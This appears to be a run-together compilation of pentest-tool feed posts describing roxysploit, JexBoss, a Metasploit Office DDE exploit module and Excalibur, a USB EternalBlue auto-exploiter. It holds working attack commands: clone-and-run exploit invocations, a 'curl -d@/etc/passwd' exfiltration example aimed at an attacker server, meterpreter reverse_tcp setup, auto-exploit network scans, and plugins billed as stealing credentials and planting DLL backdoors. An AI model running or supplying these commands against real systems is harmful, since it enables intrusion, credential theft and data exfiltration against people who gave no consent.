roxysploit – Penetration Testing Suite

roxysploit is a community-supported, open-source and penetration testing suite that supports attacks for numerous scenarios. conducting attacks in the field.Some containing Plugins in roxysploitScan is a automated Information gathering plugin it gives the user the ability to have a rest while the best Information gathering plugin can be executed.Jailpwn is a useful plugin for any iphone device that has been jailbroken it will attempt to login to the ssh using its default password giving you a full shell.Eternalblue is a recent plugin we added it Exploits a vulnerability on SMBv1/SMBv2 protocols these were collected from the nsa cyberweapons.Internalroute Exploits multiple vulnerabilities in routers this can become very useful such as hotel wifi’s.Aurora this is a old plugin that can become very useful for pen-testers it exploits Internet Explorer 6 URL vulnerability.Doublepulsar is giving you the ability to Remotely inject a malicious dll backdoor into a windows computer.Kodi is a fantastic movie streaming platform but however it runs on linux we have Created a malicious addon(backdoor) via kodi.tvBleed uses a mass vulnerability check on finding any SSL Vulnerabilities.Tresspass is a way of managing your php backdoor and gaining shell or even doing single commands it requires password authentication stopping any lurker.Handler is commonly used to create a listener on a port.Poppy is a mitm plugin allowing you to Arp spoof and sniff unencrypted passwords on all protocals such as ftp and http.Redcarpet is a nice plugin keeping you safe from malicious hackers this will Encrypt a user directory. Picklock is a local bruteforce plugin that you can Picklock/bruteforce Mulitple devices Pincodes such as android usb debugging.Passby can load a usb to steal all credentials from a windows computer in seconds.Dnsspoof is common for man in the middle attacks, it can redirect any http requests to your dns.Smartremote this is more of a funny remote exploit you can Take over a smart tv’s remote control without authentication.Blueborne is a recent Bluetooth memory leak all devices even cars.Credswipe you have to have a card reader to clone them.Rfpwn suitable device to bruteforce a special AM OOK or raw binary signal.Ftpbrute Brute-force attack an ftp(file transfer protocol) server Wifijammer you can Deauth wifi networks around your area, meaning disconnecting all users connected to the network.It is frequently updated Tested on . Arch Linux Working Kali Linux Working Ubuntu Working Debian Working Centos Not Tested MacOSX Needs porting Windows Ha no. How to install$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash installExecuting plugins examplesrsf > use Picklockrsf (plugins/picklock) > helpCore Commands============= Command Description ——- ———– help show help menu execute run the plugin exit exit the current pluginrsf (plugins/picklock) > execute[?] OS :: Select the devices os*0) Android :: Bruteforce 4digit pincode usb debugging 1) Linux :: Bruteforce Encrypted partions[+] device: [0]:rsf > use Poppyrsf (plugins/poppy) > execute[?] Interface :: Your interface[+] interface: [wlan0]: wlp6s0[?] Target :: Enter the targets ip[+] target: [192.326.1.25]: 192.168.1.2[?] Gateway :: Enter the gateway/router ip[+] router: [192.168.1.1]:[?] Function :: Would you like to setup dns spoofing?*0) no :: Disable dns spoofing 1) yes :: Enable dns spoofing[+] function: [0]:[?] Configuring PluginName Set Value—- ———-Interface wlp6s0Target 192.168.1.2Router 192.168.1.1Plugin plugins/poppy[?] Execute Plugins? [yes]: [*] Enabling IP Forwarding…[*] Poisoning Targets…What operating systems support roxysploit?All Linux distros are currently supported, it is recomended for a prebuilt pentesting os like kali linux although.Credits0x5a Aaronius Witt TDHU Team(InsaneLand) @2017Download roxysploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/kzGLoxuDy-I/roxysploit-penetration-testing-suite.html

JexBoss – JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.RequirementsPython >= 2.7.xurllib3ipaddressInstallation on Linux\MacTo install the latest version of JexBoss, please use the following commands:git clone https://github.com/joaomatosf/jexboss.gitcd jexbosspip install -r requires.txtpython jexboss.py -hpython jexboss.py -host http://target_host:8080OR:Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zipunzip master.zipcd jexboss-masterpip install -r requires.txtpython jexboss.py -hpython jexboss.py -host http://target_host:8080If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:yum -y install centos-release-sclyum -y install python27scl enable python27 bashInstallation on WindowsIf you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:Download and install PythonDownload and install Git for WindowsAfter installing, run the Git for Windows and type the following commands: PATH=$PATH:C:\Python27\ PATH=$PATH:C:\Python27\Scripts git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080 FeaturesThe tool and exploits were developed and tested for:JBoss Application Server versions: 3, 4, 5 and 6.Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces – JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)The exploitation vectors are:/admin-consoletested and working in JBoss versions 5 and 6/jmx-consoletested and working in JBoss versions 4, 5 and 6/web-console/Invokertested and working in JBoss versions 4, 5 and 6/invoker/JMXInvokerServlettested and working in JBoss versions 4, 5 and 6Application Deserializationtested and working against multiple java applications, platforms, etc, via HTTP POST ParametersServlet Deserializationtested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an “Invoker" in a link)Apache Struts2 CVE-2017-5638tested in Apache Struts 2 applicationsOthersVideosExploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBossExploiting JBoss Application Server with JexBossExploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)ScreenshotsSimple usage examples:$ python jexboss.pyExample of standalone mode against JBoss:$ python jexboss.py -u http://192.168.0.26:8080Usage modes:$ python jexboss.py -hNetwork scan mode:$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txtNetwork scan with auto-exploit mode:$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txtResults and recommendations:Reverse Shell (meterpreter integration)After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command: jexremote=YOUR_IP:YOUR_PORT Example: Shell>jexremote=192.168.0.10:4444Example: When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.Usage examplesFor Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:$ python jexboss.py -u http://vulnerable_java_app/page.jsf –app-unserialize -H parameter_name –cmd ‘curl -d@/etc/passwd http://your_server’For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):$ python jexboss.py -u http://vulnerable_java_app/page.jsf –app-unserialize -H parameter_nameFor Java Deserialization Vulnerabilities in a Servlet (like Invoker):$ python jexboss.py -u http://vulnerable_java_app/path –servlet-unserializeFor Apache Struts 2 (CVE-2017-5638)$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action –struts2For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action –struts2 –cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"Auto scan mode:$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.logFile scan mode:$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.logMore Options:optional arguments: -h, –help show this help message and exit –version show program’s version number and exit –auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!) –disable-check-updates, -D Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt -mode {standalone,auto-scan,file-scan} Operation mode (DEFAULT: standalone) –app-unserialize, -j Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc) –servlet-unserialize, -l Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces) –jboss Check only for JBOSS vectors. –jenkins Check only for Jenkins CLI vector. –jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default. –proxy PROXY, -P PROXY Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128) –proxy-cred LOGIN:PASS, -L LOGIN:PASS Proxy authentication credentials (eg -L name:password) –jboss-login LOGIN:PASS, -J LOGIN:PASS JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin) –timeout TIMEOUT Seconds to wait before timeout connection (default 3)Standalone mode: -host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080)Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER): –reverse-host RHOST:RPORT, -r RHOST:RPORT Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331) –cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server) –windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe) –post-parameter PARAMETER, -H PARAMETER Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState) --show-payload, -t Print the generated payload. --gadget {commons-collections3.1,commons-collections4.0,groovy1} Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins) --load-gadget FILENAME Provide your own gadget from file (a java serialized object in RAW mode) --force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.Auto scan mode: -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) -ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443) -results FILENAME File name to store the auto scan resultsFile scan mode: -file FILENAME_HOSTS Filename with host list to be scanned (one host per line) -out FILENAME_RESULTS File name to store the file scan resultsDownload JexBoss

Link: http://feedproxy.google.com/~r/PentestTools/~3/qpZOA4OeFCU/jexboss-jboss-and-others-java.html

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploit Copy paste the code into any word/excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/

Excalibur – An Eternalblue exploit payload based Powershell

Excalibur is an Eternalblue exploit based “Powershell" for the Bashbunny project. It’s purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain. Excalibur may be used only for demostrations purposes only, and the developers are not responsible to any misuse or illeagal usage.What does it do?When Excalibur gets connected to the machine, it will run the following:Trys to bypass UAC, or just get administrative rightsGets interface info (IP addresses) and build a network map inside a TXT file.Scans port 445 for the known "MS10-17" ("EternalBlue") vulnerability in every segment found.Exploits every machine and drop a shell to a remote machine.How to?Follow the steps here to compile a shellcode: https://github.com/vivami/MS17-010Copy payload.txt to the switch folder.Copy the "eternablblue_exploit7.py" and compile it using Pyinstaller:"pip install pyinstaller""pipinstaller –onefile eternablblue_exploit7.py"Add your shellcode and the compiled exploiter into "a.zip" and copy it to the "loot" folder".a.zip needs to contain a compiled, standalone eternalblue exploiter from "vivami’s" repo and the shellcode.Copy the powershell script to (p_v2.ps1) to the loot folder.TODOAdd persistency in terms of add a new user account, and persistent shell.Exploit other machines and applications in the network, with the credentials added in the persistency step.Exfiltrate sensitive data from the network, outside.Bug fixes, and exploits stabilizations.NotesExcalibur is still in Beta, bugs are iminent.Download Excalibur

Link: http://feedproxy.google.com/~r/PentestTools/~3/WW_tYNzj9lw/excalibur-eternalblue-exploit-payload.html